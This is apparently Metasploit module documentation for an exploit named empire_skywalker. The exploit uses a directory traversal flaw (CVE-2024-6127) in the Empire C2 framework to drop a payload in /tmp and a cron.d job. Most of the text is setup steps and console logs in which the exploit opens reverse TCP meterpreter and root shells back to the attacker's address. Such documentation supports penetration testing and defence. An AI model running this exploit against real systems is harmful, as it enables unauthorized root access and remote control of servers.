Vulnerable Application
This module exploits a directory traversal vulnerability in both BC-SECURITY/Empire C2 Framework (<5.9.3) and ProjectEmpire/Empire (<f030cf62) and writes the payload to /tmp/ directory followed by a cron.d file to execute the payload.
The vulnerability affects:
* BC-SECURITY/Empire C2 Framework (<5.9.3)
* ProjectEmpire/Empire (<f030cf62)
This module was successfully tested on:
* BC-SECURITY/Empire C2 Framework (v5.9.2) on Kali Linux 6.6.15
* BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15
* ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15
Install and run the vulnerable Empire
BC-SECURITY/Empire
Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
Install Kali Linux (or other Linux distro) in your virtualization engine.
Pull pre-built Empire docker container (<5.9.3) in your VM. docker pull bcsecurity/empire:v5.9.2
Run the server and the client on the same VM.
Run the server.
docker run -it --net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d bcsecurity/empire:v5.9.2 (--net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d is not realistic but for simplicity and payload will be loaded in host not in container) or
docker run -it --net="host" bcsecurity/empire:v5.9.2
docker exec -it <server container id> bash
apt update
apt install cron
cron
(Payload will be loaded in container but you have to manually set up cron on container.)
Run the client. docker run -it --net="host" bcsecurity/empire:v5.9.2 client
Execute Empire listener on client.
uselistener http
set Host <rhost>
set Port <port>
execute
ProjectEmpire/Empire
Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
Install Kali Linux (or other Linux distro) in your virtualization engine.
Clone empire. git clone https://github.com/EmpireProject/Empire.git
cd Empire
git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110
docker pull empireproject/empire
docker run -it --net="host" -v $(pwd):/opt/Empire -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d empireproject/empire /bin/bash
(Payload will be loaded in host not in container.) or
docker run -it --net="host" empireproject/empire /bin/bash
cron
(Payload will be loaded in container but you have to manually set up cron on container.)
cd setup
./reset.sh (Empire start)
Execute listener.
listeners
set Host <rhost>
set Port <port>
run
Verification Steps
Install the application
Start msfconsole
Do: use exploit/linux/http/empire_skywalker
Do: set rhost <rhost>
Do: set rport <port>
Do: set lhost <attacker-ip>
Optional: set CVE <cve>
Do: run
Have the generated request processed by a vulnerable version of Empire
You should get a shell or meterpreter
Options
TARGETURI (optional)
This is the Base URI path. This is used when CVE is set to Original. Default is /.
STAGE0_URI (required)
This is the URI path requested by the initial launcher. This is used when CVE is set to Original. Default is index.asp.
STAGE1_URI (required)
This is the URI path used by the RSA key post. This is used when CVE is set to Original. Default is index.jsp
PROFILE (optional)
This is Empire agent traffic profile URI. This is used when CVE is set to Original.
CVE (required)
This is the vulnerability to use. Default is CVE-2024-6127, but Original can also be chosen.
STAGE_PATH (required)
This is the Empire's default staging path. This is used when CVE is set to CVE-2024-6127. Default is login/process.php. (reference)
PROFILE (required)
This is the Empire's default communication profile agent. This is used when CVE is set to CVE-2024-6127. Default is Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko (reference)
Scenarios
BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)
msf6 > use exploit/linux/http/empire_skywalker
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
rhost => 192.168.56.7
msf6 exploit(linux/http/empire_skywalker) > set rport 80
rport => 80
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.7:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/NYLkIKRK
[*] Writing cron job to /etc/cron.d/AeVTTPiZ
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.7
[+] Deleted /etc/cron.d/AeVTTPiZ
[+] Deleted /tmp/NYLkIKRK
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target
meterpreter > sysinfo
Computer : kali
OS : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture : x64
System Language : en_US
Meterpreter : python/linux
BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/jJzYkeKV
[*] Writing cron job to /etc/cron.d/nFnFIbim
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/nFnFIbim
[+] Deleted /tmp/jJzYkeKV
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900
whoami
root
BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/qxlOSIYF
[*] Writing cron job to /etc/cron.d/ugrYIJzf
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/ugrYIJzf
[+] Deleted /tmp/qxlOSIYF
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900
whoami
root
ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 0, port 8080)
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/PSDaqPOJ
[*] Writing cron job to /etc/cron.d/KQlwBZQk
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/KQlwBZQk
[+] Deleted /tmp/PSDaqPOJ
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:38552) at 2024-07-24 18:01:04 +0900
[!] This exploit may require manual cleanup of '/agent.log' on the target
meterpreter > sysinfo
Computer : kali
OS : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf6 exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/VzTAquhE
[*] Writing cron job to /etc/cron.d/LjvThMOu
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/LjvThMOu
[+] Deleted /tmp/VzTAquhE
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:47140) at 2024-07-24 18:06:08 +0900
whoami
root
ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set cve Original
cve => Original
msf6 exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/uuTqlfDp
[*] Writing cron job to /etc/cron.d/frDtYnmD
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/frDtYnmD
[+] Deleted /tmp/uuTqlfDp
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:51566) at 2024-07-24 18:08:08 +0900
whoami
root
